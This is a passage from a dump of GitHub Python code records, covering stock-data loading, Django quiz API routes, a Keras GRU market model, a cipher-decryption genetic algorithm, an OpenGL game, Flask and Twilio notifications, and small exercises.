pd.read_csv(r\"../data/AAPL_TIME_SERIES_DAILY.csv\")\nprint(df.head())\n\n\nclass StockDataLocal:\n \"\"\" Class method to get and process local stock data\"\"\"\n\n def __init__(self, data_folder_path = \"../data/\") -> None:\n self._data_folder_path = data_folder_path\n\n def stock_dataframe(self, stockname) -> 
list:\n \"\"\"\n Returns: list of two dataframes, one for daily time series, one for intraday\n \"\"\"\n stock_df_list = []\n\n for path_ending in [\"_TIME_SERIES_DAILY.csv\", \"_TIME_SERIES_INTRADAY_EXTENDED.csv\"]:\n path = self._data_folder_path + stockname + path_ending\n stock = pd.read_csv(path, index_col=0, parse_dates=True)\n stock.index.rename(\"Date\", inplace=True) \n # inplace=True gör att man inte behöver göra stock.index = stock.index.rename\n\n stock_df_list.append(stock)\n return stock_df_list\n\n \"\"\"\n sdl = StockDataLocal()\n stock_list = sdl.stock_dataframe(\"TSLA\")\n stocklist[0]\n \"\"\"\n","repo_name":"jonssonmarie/Databehandling-MarieJonsson","sub_path":"code_along/L5_dashboard/L5_3_dashboard/load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"45148985476","text":"from django.urls import path\n\nfrom student.api.views import CreateUserView, CreateTokenView, ManageUserView, user_properties_view, GetExamView, \\\n GetQuestionView, SaveResponseView, ListExamResponsesView, CreateExamResultsView, ListExamResultsView, \\\n ListQuestionForumView, CreateQuestionForumView, ManageQuestionForumView\n\napp_name = 'student_api'\n\nurlpatterns = [\n path('users/create/', CreateUserView.as_view(), name='create'),\n path('users/token/', CreateTokenView.as_view(), name='token'),\n path('users/me/', ManageUserView.as_view(), name='me'),\n path('users/me/properties/', user_properties_view, name='user_properties'),\n\n path('exams/', GetExamView.as_view()),\n path('exams//', GetQuestionView.as_view()),\n path('exams/response/save/', SaveResponseView.as_view()),\n path('exams/responses//', ListExamResponsesView.as_view()),\n path('exams/result/create/', CreateExamResultsView.as_view()),\n path('exams/results/', ListExamResultsView.as_view()),\n path('forums/question//', ListQuestionForumView.as_view()),\n path('forums/question/create//', CreateQuestionForumView.as_view()),\n path('forums/question/manage//', ManageQuestionForumView.as_view()),\n]\n","repo_name":"Marmik2003/quiz_project","sub_path":"student/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"71148511840","text":"import numpy as np\n\n\ndef sph2cart(theta: float, phi: float) -> np.ndarray:\n \"\"\"\n Get the rotation matrix for transforming spherical coordinates\n to cartesian. Note that the matrix is orthogonal so the inverse transform\n is given by its transpose.\n \"\"\"\n sin_th = np.sin(theta)\n cos_th = np.cos(theta)\n sin_ph = np.sin(phi)\n cos_ph = np.cos(phi)\n rot_matrix = np.array(\n [\n [sin_th * cos_ph, cos_th * cos_ph, -sin_ph],\n [sin_th * sin_ph, cos_th * sin_ph, cos_ph],\n [cos_th, -sin_th, 0],\n ]\n )\n return rot_matrix\n\n\ndef cart2sph(theta: float, phi: float) -> np.ndarray:\n \"\"\"\n Get the rotation matrix for transforming cartesian coordinates to\n sphericals given sky angles. 
This is simply the transpose of the matrix that\n transforms sphericals to cartesian.\n \"\"\"\n rot_matrix = sph2cart(theta, phi).T\n return rot_matrix\n","repo_name":"christianhbye/lusee_sky_simulations","sub_path":"luseesky/utils/coordinates.py","file_name":"coordinates.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"31826031414","text":"# Author: Mark Harmon\n# Purpose: Neural Network on the CME Dataset (Simple Recurrent Model with GRU)\n# Walk Forward Method incoming...\n\nfrom __future__ import print_function\nimport matplotlib\nmatplotlib.use('pdf')\nimport matplotlib.pyplot as plt\nfrom keras.layers import Input, Embedding, GRU, Dense\nfrom keras.models import Model,load_model\nfrom keras.callbacks import EarlyStopping,ModelCheckpoint\nimport pickle as pkl\nimport numpy as np\nfrom os import listdir\nfrom os.path import isfile, join\nfrom sklearn import metrics\nimport time\n\ndef build_rnn():\n main_input = Input(shape=(5,5,), dtype='float32', name='main_input')\n gru1 = GRU(512,return_sequences=True)(main_input)\n gru2 = GRU(512)(gru1)\n # I'm looping right here, but this may be overly complicated\n out = [Dense(5, activation='softmax', name=('main_output' + str(i)))(gru2) for i in range(5)]\n model = Model(main_input, out)\n\n model.compile(optimizer='rmsprop', loss='categorical_crossentropy',metrics=['accuracy'])\n\n return model\n\ndef make_class_weights(classlab):\n\n for i in range(5):\n temp = np.max(np.sum(classlab[0],axis=0))/(np.sum(classlab[0],axis=0)+1)\n if i ==0:\n all = temp\n else:\n all = np.concatenate((all,temp))\n\n # Long and annoying, but easy to read. Find a better way to do this later...\n class_weight = [[{0: all[0],\n 1: all[1],\n 2: all[2],\n 3: all[3],\n 4: all[4]}],[{0: all[5],\n 1: all[6],\n 2: all[7],\n 3: all[8],\n 4: all[9]}],[{0: all[10],\n 1: all[11],\n 2: all[12],\n 3: all[13],\n 4: all[14]}],[{0: all[15],\n 1: all[16],\n 2: all[17],\n 3: all[18],\n 4: all[19]}],[{0: all[20],\n 1: all[21],\n 2: all[22],\n 3: all[23],\n 4: all[24]}]]\n\n return class_weight\n\n# Train model here\ndef main():\n address = '/home/mharmon/FinanceProject/Data/tickdata/train05.pkl'\n\n data,labels = pkl.load(open(address,'rb'))\n\n data = (data - np.mean(data,axis=0))/np.std(data,axis=0)\n model = build_rnn()\n epochs = 100\n month_len = 4*8064\n year_len = 8064*12\n week = int((month_len/4.)/4.)\n numtests = 30\n\n\n num_its = int(4*len(data)/month_len)\n print(num_its)\n modelsavepath = '/home/mharmon/FinanceProject/ModelResults/tick/tickmodel05.hdf5'\n\n beg = 0\n end = month_len\n pngcount=0\n f1store = np.zeros((numtests,5,5))\n\n stock1 = [[], [], [], [], []]\n stock2 = [[], [], [], [], []]\n stock3 = [[], [], [], [], []]\n stock4 = [[], [], [], [], []]\n stock5 = [[], [], [], [], []]\n f1wherestore=[]\n for i in range(numtests):\n\n epochx = data[beg:end]\n epoch_lab = labels[beg:end]\n testx = data[end:end+week]\n test_lab = labels[end:end+week]\n testy = [test_lab[:,i,:] for i in range(len(test_lab[0,:,0]))]\n\n # Do at least 5 validation sets here..\n\n vallen = int(len(epochx) * 0.2)\n trainx = epochx[0:len(epochx) - vallen]\n trainy = [epoch_lab[0:len(epochx) - vallen, i, :] for i in range(len(epoch_lab[0, :, 0]))]\n\n valx = epochx[len(epochx) - vallen:]\n valy = [epoch_lab[len(epochx) - vallen:, i, :] for i in range(len(epoch_lab[0, :, 0]))]\n\n for j in range(2):\n\n\n class_weight = make_class_weights(trainy)\n\n best_loss = 10000\n patience = 0\n 
while patience<5:\n firsttime=time.time()\n hist = model.fit(trainx, trainy, batch_size=64, verbose=0, epochs=1, validation_data=(valx,valy),\n class_weight=class_weight)\n endtime=time.time()\n current_val = hist.history['val_loss'][0]\n print('')\n print('Window ' + str(i))\n print('Round ' + str(j))\n print('Epoch Took \"%.3f Seconds' %(endtime-firsttime))\n print('Train Loss is ' + str(hist.history['loss'][0]))\n print('Validation Loss is ' + str(hist.history['val_loss'][0]))\n if current_val0:\n stock1[h]+=predictions[h][tempvec1,0].tolist()\n if len(tempvec2)>0:\n stock2[h]+= predictions[h][tempvec2,1].tolist()\n if len(tempvec3)>0:\n stock3[h]+=predictions[h][tempvec3,2].tolist()\n if len(tempvec4)>0:\n stock4[h]+=predictions[h][tempvec4,3].tolist()\n if len(tempvec5)>0:\n stock5[h]+=predictions[h][tempvec5,4].tolist()\n\n\n\n # Print histograms at the end I suppose...\n figmain = '/home/mharmon/FinanceProject/ModelResults/tick/Figures/HistogramAllWeeksStock'\n\n for c in range(5):\n\n figfinal = figmain + '1Class'+str(c)+'.png'\n plt.figure(pngcount)\n plt.hist(stock1[c])\n plt.xlabel('Bins')\n plt.ylabel('Count')\n plt.title('Histogram of ' + str(i+1) + ' Weeks For Stock 1' + ' And Class ' + str(c))\n plt.savefig(figfinal)\n plt.close()\n pngcount+=1\n\n figfinal = figmain + '2Class'+str(c)+'.png'\n plt.figure(pngcount)\n plt.hist(stock2[c])\n plt.xlabel('Bins')\n plt.ylabel('Count')\n plt.title('Histogram of ' + str(i+1) + ' Weeks For Stock 2' + ' And Class ' + str(c))\n plt.savefig(figfinal)\n plt.close()\n pngcount+=1\n\n figfinal = figmain + '3Class'+str(c)+'.png'\n plt.figure(pngcount)\n plt.hist(stock3[c])\n plt.xlabel('Bins')\n plt.ylabel('Count')\n plt.title('Histogram of ' + str(i+1) + ' Weeks For Stock 3' + ' And Class ' + str(c))\n plt.savefig(figfinal)\n plt.close()\n pngcount+=1\n\n figfinal = figmain + '4Class'+str(c)+'.png'\n plt.figure(pngcount)\n plt.hist(stock4[c])\n plt.xlabel('Bins')\n plt.ylabel('Count')\n plt.title('Histogram of ' + str(i+1) + ' Weeks For Stock 4' + ' And Class ' + str(c))\n plt.savefig(figfinal)\n plt.close()\n pngcount+=1\n\n figfinal = figmain + '5Class'+str(c)+'.png'\n plt.figure(pngcount)\n plt.hist(stock5[c])\n plt.xlabel('Bins')\n plt.ylabel('Count')\n plt.title('Histogram of ' + str(i+1) + ' Weeks For Stock 5' + ' And Class ' + str(c))\n plt.savefig(figfinal)\n plt.close()\n pngcount+=1\n\n\n\n return hist\n\nif __name__=='__main__':\n main()","repo_name":"mdharmo/FinanceProject","sub_path":"tickweightnet.py","file_name":"tickweightnet.py","file_ext":"py","file_size_in_byte":9328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"5382322664","text":"# 같은 날 동시에 가입한 3명의 사람들이 온라인 채점시스템에 들어와 문제를 푸는 날짜가\n# 매우 규칙적이라고 할 때, 다시 모두 함께 문제를 풀게 되는 그날은 언제일까?\n#\n# 예를 들어 3명이 같은 날 가입/등업하고, 각각 3일마다, 7일마다, 9일마다\n# 한 번씩 들어온다면, 처음 가입하고 63일 만에 다시 3명이 함께 문제를 풀게 된다.\n# 같은 날 동시에 가입한 인원 3명이 규칙적으로 방문하는,\n# 방문 주기가 공백을 두고 입력된다. 
(단, 입력값은 100이하의 자연수이다.)\n\nx, y, z= input().split(' ')\na = int(x)\nb = int(y)\nc = int(z)\nday = 1\n\nwhile True:\n if day%a!=0 or day%b!=0 or day%c!=0:\n day +=1\n else:\n break\nprint(day)\n\n# if a % b ==0:\n# common1 = a\n# if common1 % c == 0:\n# common2 = common1\n# else:\n# common2 = common1 * c\n# elif b % a == 0:\n# common1 = b\n# if common1 % c == 0:\n# common2 = common1\n# else:\n# common2 = common1 * c\n# else:\n# common1 = a * b\n# if common1 % c == 0:\n# common2 = common1\n# else:\n# common2 = common1 * c\n# print(common2)\n\n","repo_name":"oshsage/Python_Pandas","sub_path":"py4e/CodeUp/1092_comprehensive.py","file_name":"1092_comprehensive.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"15920588769","text":"import sys\r\n\r\ninput = sys.stdin.readline\r\n\r\nn = int(input())\r\nm = int(input())\r\n\r\narr = list(map(int,input().split()))\r\narr.sort()\r\n\r\ncount = 0\r\ni=0\r\nj=(n-1)\r\n\r\nwhile im:\r\n j-=1\r\n else:\r\n count +=1\r\n i +=1\r\n j -=1\r\n\r\n\r\nprint(count)\r\n\r\n","repo_name":"Gye-jin/Study-algorithm","sub_path":"백준/Silver/1940. 주몽/주몽.py","file_name":"주몽.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"35606412151","text":"Range, number = map(int, input().split())\na = list(map(int, input().split()))\na.sort()\nanswer = []\n\ndef p(count):\n if count == number:\n print(\" \".join(map(str, answer)))\n return\n else:\n for i in range(Range):\n if answer:\n answer.append(a[i])\n p(count+1)\n answer.pop()\n else:\n answer.append(a[i])\n p(count+1)\n answer.pop()\np(0)","repo_name":"Deserve82/KK_Algorithm_Study","sub_path":"Kangho/BOJ_15656.py","file_name":"BOJ_15656.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"19924298692","text":"# lab02 WWPD?\n\nimport inspect\n\n# preliminaries\n\ndef repeat():\n print(\"try again:\")\n return input()\n\n\ndef intro():\n print(\"What Would Python Display?\")\n print(\n \"type the expected output, 'function' if you think the answer is a function object, 'infinite loop' if it loops forever, 'nothing' if nothing is displayed, or 'error' if it errors; use single quotes '' when needed\\n\"\n )\n\n\ndef outro():\n print(\"\\nall questions for this question set complete\")\n\n\n# reference functions\n\na = lambda x: x\nb = lambda x: lambda: x\nc = b(88)\nd = lambda f: f(4)\n\ndef square(x):\n return x * x\n\nz = 3\ne = lambda x: lambda y: lambda: x + y + z\n\nhigher_order_lambda = lambda f: lambda x: f(x)\ng = lambda x: x * x\ncall_thrice = lambda f: lambda x: f(f(f(x)))\nprint_lambda = lambda z: print(z)\n\n\ndef even(f):\n def odd(x):\n if x < 0:\n return f(-x)\n return f(x)\n return odd\n\nsteven = lambda x: x\n\ndef cake():\n print('beets')\n def pie():\n print('sweets')\n return 'cake'\n return pie\n\ndef snake(x, y):\n if cake == more_cake:\n return chocolate\n else:\n return x + y\n\n# wwpd questions\n\n\ndef wwpd_lambdas(): # wwpd_lambdas\n intro()\n \n print(\">>> lambda x: x\")\n x = input()\n while x != 'function':\n x = repeat()\n\n print(\">>> a = lambda x: x # Assigning the lambda function to the name a\")\n print(\">>> a(5)\")\n x = input()\n while x != str(a(5)):\n x = repeat()\n\n print(\">>> (lambda: 3)() # Using a lambda expression as an operator in a call exp.\")\n x = input()\n while x 
!= \"3\":\n x = repeat()\n\n print(\">>> b = lambda x: lambda: x # Lambdas can return other lambdas!\")\n print(\">>> c = b(88)\")\n print(\">>> c\")\n x = input()\n while x != \"function\":\n x = repeat()\n print(\">>> c()\")\n x = input()\n while x != str(c()):\n x = repeat()\n\n print(\"\\n\", inspect.getsource(square))\n print(\">>> d = lambda f: f(4) # They can have functions as arguments as well.\")\n print(\">>> d(square)\")\n x = input()\n while x != str(d(square)):\n x = repeat()\n\n\n\n print(\">>> x = None\")\n print(\">>> x\")\n print(\">>> lambda x: x\")\n x = input()\n while x != \"function\":\n x = repeat()\n\n\n\n print(\">>> z = 3\")\n print(\">>> e = lambda x: lambda y: lambda: x + y + z\")\n print(\">>> e(0)(1)()\")\n x = input()\n while x != \"4\":\n x = repeat()\n\n print(\">>> f = lambda z: x + z\")\n print(\">>> f(3)\")\n x = input()\n while x != \"error\":\n x = repeat()\n\n\n\n print(\">>> higher_order_lambda = lambda f: lambda x: f(x)\")\n print(\">>> g = lambda x: x * x\")\n print(\">>> higher_order_lambda(2)(g) # Which argument belongs to which function call?\")\n x = input()\n while x != \"error\":\n x = repeat()\n \n print(\">>> higher_order_lambda(g)(2)\")\n x = input()\n while x != str(higher_order_lambda(g)(2)):\n x = repeat()\n\n print(\">>> call_thrice = lambda f: lambda x: f(f(f(x)))\")\n print(\">>> call_thrice(lambda y: y + 1)(0)\")\n x = input()\n while x != str(call_thrice(lambda y: y + 1)(0)):\n x = repeat()\n\n print(\">>> print_lambda = lambda z: print(z) # When is the return expression of a lambda expression executed?\")\n print(\">>> print_lambda\")\n x = input()\n while x != \"function\":\n x = repeat()\n \n print(\">>> one_thousand = print_lambda(1000)\")\n x = input()\n while x != \"1000\":\n x = repeat()\n\n print(\">>> one_thousand\")\n x = input()\n while x != \"nothing\":\n x = repeat()\n\n outro()\n\n\ndef wwpd_hofs(): # wwpd_hofs\n intro()\n print(\"\\n\", inspect.getsource(even))\n\n print(\">>> steven = lambda x: x\")\n print(\">>> stewart = even(steven)\")\n print(\">>> stewart\")\n x = input()\n while x != \"function\":\n x = repeat()\n\n print(\">>> stewart(61)\")\n x = input()\n while x != str(even(steven)(61)):\n x = repeat()\n\n print(\">>> stewart(-4)\")\n x = input()\n while x != str(even(steven)(-4)):\n x = repeat()\n\n \n\n print(\"\\n\", inspect.getsource(cake)) # cake\n\n print(\">>> chocolate = cake()\")\n x = input()\n while x != \"beets\":\n x = repeat()\n\n print(\">>> chocolate\")\n x = input()\n while x != \"function\":\n x = repeat()\n\n print(\">>> chocolate()\")\n x = input()\n while x != \"sweets\":\n x = repeat()\n \n x = input()\n while x != \"'cake'\":\n x = repeat()\n\n print(\">>> more_chocolate, more_cake = chocolate(), cake\")\n x = input()\n while x != 'sweets':\n x = repeat()\n\n print(\">>> more_chocolate\")\n x = input()\n while x != \"'cake'\":\n x = repeat()\n\n print(\"\\n\", inspect.getsource(snake))\n print('>>> snake(10, 20)')\n x = input()\n while x != \"function\":\n x = repeat()\n \n print(\">>> cake = 'cake'\")\n print(\">>> snake(10, 20)\")\n x = input()\n while x != \"30\":\n x = repeat()\n\n outro()","repo_name":"rebeccac05/lab02-rebeccac05","sub_path":"labs/lab02_wwpd.py","file_name":"lab02_wwpd.py","file_ext":"py","file_size_in_byte":4936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"14246241269","text":"# coding: utf-8\n\nfrom OpenGL.GL import *\nfrom OpenGL.GLUT import *\nfrom OpenGL.GLU import *\n\nfrom camera import 
Camera\nfrom model_loader import *\nfrom vector import Vector3\nfrom input import Input\nfrom player import Player\nfrom gamefield import GameField\n\nimport sys\n\nclass Game:\n\n WINDOW_WIDTH = 1024\n WINDOW_HEIGHT = 768\n\n def __init__(self):\n self.camera = Camera()\n self.input = Input([])\n self.player = Player(self.camera, self.input)\n self.game_field = GameField(self.player)\n self.input.game_field = self.game_field # set game field\n\n def init_gl(self):\n\n glClearColor(0.5, 0.5, 0.5, 1)\n glClearDepth(1) # каждое новое значение z меньше или равно 1\n glEnable(GL_DEPTH_TEST) # включаем буфер глубины (для z координат)\n glEnable(GL_NORMALIZE) # нормали к единичной длине\n glDepthFunc(GL_LEQUAL) # позволяет отрисовывать обьекты привычным образом\n\n glHint(GL_PERSPECTIVE_CORRECTION_HINT, GL_FASTEST) # включаем точное текстурирование\n\n # init light\n glEnable(GL_LIGHTING)\n\n glEnable(GL_LIGHT0)\n glLightfv(GL_LIGHT0, GL_DIFFUSE, [1, 1, 1]) # цвет\n glLightfv(GL_LIGHT0, GL_POSITION, [0, 0, 1, 1]) # 4 аргумент - 0 - рассеянное освещение, 1 - точечное\n glLightf(GL_LIGHT0, GL_SPOT_CUTOFF, 10) # угол между осью и стороной конуса света\n glLightf(GL_LIGHT0, GL_SPOT_EXPONENT, 100) # экспонента убывания интенсивности\n\n # ambient\n glEnable(GL_LIGHT1)\n glLightfv(GL_LIGHT1, GL_DIFFUSE, [0.1, 0.1, 0.1])\n glLightfv(GL_LIGHT1, GL_POSITION, [1, 1, 0, 1])\n\n # init fog\n glFogi(GL_FOG_MODE, GL_EXP2) # алгоритм тумана\n glFogfv(GL_FOG_COLOR, [0.5, 0.5, 0.5, 1])\n glFogf(GL_FOG_DENSITY, 0.15)\n glHint(GL_FOG_HINT, GL_FASTEST) # мы за качеством тумана не гонимся\n glFogf(GL_FOG_START, 1.0) # глубина начала тумана\n glFogf(GL_FOG_END, 5.0) # конец тумана\n glEnable(GL_FOG)\n\n # face culling\n glEnable(GL_CULL_FACE) # включаем возможность пропуска отрисовки невидимых обьектов\n glCullFace(GL_BACK) # убираем отрисовку всего что сзади обьекта\n\n # init camera\n self.camera.set_position(Vector3(0, 1, 1), Vector3(0, 1, 0), Vector3(0, 1, 0))\n\n # init game field\n self.game_field.init()\n\n\n\n # main render function\n def display(self):\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n\n glMatrixMode(GL_MODELVIEW) # переключение матрицы чтобы координаты модели (позиция, поворот, размер) преобразовывались в мировые координаты\n\n glLoadIdentity() # единичная матрица\n gluLookAt(\n self.camera.m_pos.x, self.camera.m_pos.y, self.camera.m_pos.z,\n self.camera.m_view.x, self.camera.m_view.y, self.camera.m_view.z,\n self.camera.m_up.x, self.camera.m_up.y, self.camera.m_up.z\n ) # устанавливаем значения матрицы исходя значений нашей камеры\n\n glLightfv(GL_LIGHT0, GL_SPOT_DIRECTION,\n [self.camera.m_pos.x, self.camera.m_pos.y - 2, self.camera.m_pos.z - 10]) # point light, ф��нарь\n\n self.player.update()\n self.game_field.render()\n\n glFinish() # усё закончили\n glutSwapBuffers() # можно показать буфер в котором мы чет нарисовали\n glutPostRedisplay() # вызываем функцию которая перерисует экран, иначе анимашки работать не будут\n\n # reshaping window function\n def reshape(self, width, height):\n if height == 0:\n height = 1\n\n ratio = width / height\n glViewport(0, 0, width, height) # указываем рабочую область координат\n glMatrixMode(GL_PROJECTION) # переключение матрицы проекции для настройки вида камеры в мировых координатах (увеличение, соотношение сторон, угол просмотра)\n glLoadIdentity()\n gluPerspective(45.0, ratio, 0.1, 100.0) # делаем так, чтобы видеть как человек\n\n def run(self, argv):\n glutInit(argv)\n glutInitDisplayMode(GLUT_RGBA | GLUT_DOUBLE | GLUT_DEPTH)\n 
glutInitWindowSize(Game.WINDOW_WIDTH, Game.WINDOW_HEIGHT)\n glutInitWindowPosition(450, 50)\n glutCreateWindow('Computer Graphics Game')\n glutDisplayFunc(self.display)\n glutKeyboardFunc(self.input.register_key_down)\n glutKeyboardUpFunc(self.input.register_key_up)\n glutReshapeFunc(self.reshape)\n self.init_gl()\n print(glGetString(GL_VENDOR))\n glutMainLoop()\n\n\nif __name__ == \"__main__\":\n Game().run(sys.argv)","repo_name":"dekamaru/3d-game","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5389,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"32474558127","text":"# app/main/utils.py\nfrom flask_mail import Mail, Message\nfrom twilio.rest import Client\nfrom app import create_app\nimport os\n\nmail = Mail()\n\ndef send_email(subject, recipients, text_body):\n app = create_app()\n with app.app_context():\n msg = Message(subject, recipients=recipients)\n msg.body = text_body\n mail.send(msg)\n\ndef send_sms(to, body):\n client = Client(os.environ.get('TWILIO_ACCOUNT_SID'), os.environ.get('TWILIO_AUTH_TOKEN'))\n message = client.messages.create(\n body=body,\n from_=os.environ.get('TWILIO_PHONE_NUMBER'),\n to=to\n )\n\ndef send_notification(user, message):\n if user.notification_preference == 'email':\n send_email('Notification from SlurmBoard', [user.email], message)\n elif user.notification_preference == 'sms':\n send_sms(user.phone_number, message)\n","repo_name":"NessieCanCode/SlurmBoard","sub_path":"app/main/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"2943046923","text":"# Json is commonly used with API(application program interface), we learn how to parse Json into a python dictionary\n\nimport json\n\n# sample Json\ndetailJSON = '{\"first_name\": \"abdul\", \"last_name\": \"suleiman\", \"age\": 16}'\n\n#parse to dictionary\ndetail = json.loads(detailJSON)\n\nprint(detail)\nprint(detail['first_name'])\n\n# Getting back to json from a dictionary\n\ncarDict = {'make': 'toyota', 'model': 'camry', 'year': 2014}\n\ncarJSON = json.dumps(carDict)\nprint(carJSON)\n\n\n","repo_name":"Abduls69/Tclassified-project-work","sub_path":"json_file.py","file_name":"json_file.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"942975315","text":"\n#practice markov models and genetic algorithm in context of cipher decryption\n#data from: https://lazyprogrammer.me/course_files/moby_dick.txt\n#1. create substition cipher (ground truth)\n#2. create language model on big corpus. unigram + bigram on individual letters, NOT words\n#3. create encoding and decoding functions \n#4. 
create genetic algorithm to search for best decryption model \n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport string\nimport re\nimport random \n\n#import data, split into paragraphs\ndata = open('moby_dick.txt', encoding=\"utf8\").read()\ndata = data.split(\"\\n\\n\")\n\n#create cipher substitution \nalphabet = list(string.ascii_lowercase)\nshuffled = list(string.ascii_lowercase)\nrandom.shuffle(shuffled)\n\ncipher = {value: shuf for value, shuf in zip(alphabet, shuffled)}\n\n#initial letter probability, and first order markov letter transition probability\npi = {value: 0 for value in list(string.ascii_lowercase)}\nA = {value: {} for value in list(string.ascii_lowercase)}\nfor i in list(string.ascii_lowercase):\n A[i] = {value: 0 for value in list(string.ascii_lowercase)}\n\n#find index where first letter starts in each block of text\nfirstletter = {}\nfor si in range(len(data)):\n s = data[si]\n s = s.lower()\n for i in range(len(s)):\n if s[i] in cipher.keys():\n firstletter[si] = i\n break\n\nfor si in range(len(data)):\n if si in firstletter.keys():\n s = data[si]\n s = s.lower()\n for i in range(firstletter[si], len(s)): \n #first word\n if i == firstletter[si]:\n pi[s[i]] += 1 \n #remaining sentence\n else:\n t_1 = s[i-1]\n t = s[i]\n if t_1 in cipher.keys(): #only work with letters\n if t in cipher.keys(): \n A[t_1][t] += 1\n else:\n continue\n \n#normalize and plus-one smoothing\npi = {value:key+1 for value, key in pi.items()}\ntotalcount = sum(pi.values())\npi = {value:key/totalcount for value, key in pi.items()}\n\nfor i in A.keys():\n A[i] = {value:key+1 for value, key in A[i].items()}\n totalcount = sum(A[i].values())\n A[i] = {value:key/totalcount for value, key in A[i].items()}\n\n#encoding and decoding functions\ndef encoding(s):\n encoded = ''\n s = s.lower()\n for i in range(len(s)):\n if s[i] in cipher.keys():\n encoded += cipher[s[i]]\n else:\n encoded += s[i]\n return encoded\n \ndef decoding(s, dec): \n decoded = ''\n for i in range(len(s)):\n if s[i] in dec.keys():\n decoded += dec[s[i]]\n else:\n decoded += s[i]\n return decoded\n\n#\n# genetic algorithm\n\n#calculate probability of a sequence of letters happening using pi and A\ndef log_likelihood(s, pi, A):\n log = 0\n firstcount = 1\n for i in range(len(s)):\n if s[i] in cipher.keys(): \n #first letter\n if firstcount == 1:\n log += np.log(pi[s[i]])\n firstcount += 1 \n #remaining sentence\n else:\n t_1 = s[i-1]\n t = s[i]\n if t_1 in A.keys():\n if t in A[t_1].keys():\n log += np.log(A[t_1][t])\n return log\n\n#take in a list of sentences, and calculate mean log likelihood value\ndef fitness(s, dec, pi, A):\n encoded = encoding(s)\n decoded = decoding(encoded, dec)\n return log_likelihood(decoded, pi, A)\n \n\n\n\nsentencetotrainon = '''I then lounged down the street and found,\nas I expected, that there was a mews in a lane which runs down\nby one wall of the garden. 
I lent the ostlers a hand in rubbing\ndown their horses, and received in exchange twopence, a glass of\nhalf-and-half, two fills of shag tobacco, and as much information\nas I could desire about Miss Adler, to say nothing of half a dozen\nother people in the neighbourhood in whom I was not in the least\ninterested, but whose biographies I was compelled to listen to.\n'''\n\n#create 20 different random decoding dicts\nDNA_pool = []\nfor i in range(20):\n a = list(string.ascii_lowercase)\n s = list(string.ascii_lowercase)\n random.shuffle(s)\n DNA_pool.append({value: shuf for value, shuf in zip(a, s)})\n\n#parameters and stuff\nepochs = 1000\nscore = []\npii = list(np.repeat(pi,20))\nAA = list(np.repeat(A,20))\nsentence = [sentencetotrainon]*20\n\n#training\nfor i in range(epochs):\n print('iteration #', i)\n #create 3 offsprings per parent\n if i > 0:\n offsprings= []\n for d in DNA_pool:\n for _ in range(3):\n #for each offstring, shuffle 2 random dict rows\n values = list(d.values())\n idx = np.random.choice(25, size=2, replace = False)\n d1 = list(d.values())[idx[0]]\n d2 = list(d.values())[idx[1]]\n values[idx[0]] = d2\n values[idx[1]] = d1\n offsprings.append({value: shuf for value, shuf in zip(d.keys(), values)})\n DNA_pool = DNA_pool + offsprings\n \n scores = [fitness(s, d, pp, aa) for s, d, pp, aa in zip(sentence, DNA_pool, pii, AA)]\n score.append(np.mean(scores)) #save scores for later\n \n #sort DNA by score and keep top 5\n # DNA_pool = [x for y, x in sorted(zip(scores, DNA_pool))]\n \n sortit = np.argsort(scores)\n DNA_pool =list(np.array(DNA_pool)[sortit])\n DNA_pool = DNA_pool[-5:]\n \n \n#results vary. if log converges to ~ -800, then decoding is pretty good\nplt.plot(score) \n \nprint(sentencetotrainon)\nencoded = encoding(sentencetotrainon)\nprint('')\nprint(decoding(encoded, DNA_pool[4]))\n","repo_name":"johnson-ying/machine-learning-practice","sub_path":"nlp_pt_1/cipher_decryption.py","file_name":"cipher_decryption.py","file_ext":"py","file_size_in_byte":5682,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"20252562039","text":"from dataclasses import asdict\n\nfrom lightning import Fabric\n\n\ndef test_config_identical():\n import lit_parrot.adapter as parrot_adapter\n import lit_parrot.model as parrot\n\n name = \"pythia-70m\"\n base_config = asdict(parrot.Config.from_name(name))\n adapter_config = asdict(parrot_adapter.Config.from_name(name))\n del adapter_config[\"adapter_prompt_length\"]\n del adapter_config[\"adapter_start_layer\"]\n assert adapter_config == base_config\n\n with Fabric(accelerator=\"cpu\").init_module(empty_init=True):\n base_model = parrot.Parrot.from_name(name)\n adapter_model = parrot_adapter.Parrot.from_name(name)\n assert adapter_model.lm_head.weight.shape == base_model.lm_head.weight.shape\n","repo_name":"phedone/lit-parrot","sub_path":"tests/test_adapter.py","file_name":"test_adapter.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"73050235997","text":"import os\n\nfrom tqdm import tqdm\n\n\nOUT_DIR = '~/data_tmp/abstract/acs/pdf/'\nURL_FN = '~/data_tmp/abstract/acs/urls.txt'\nos.makedirs(OUT_DIR, exist_ok=True)\n\n\nwith 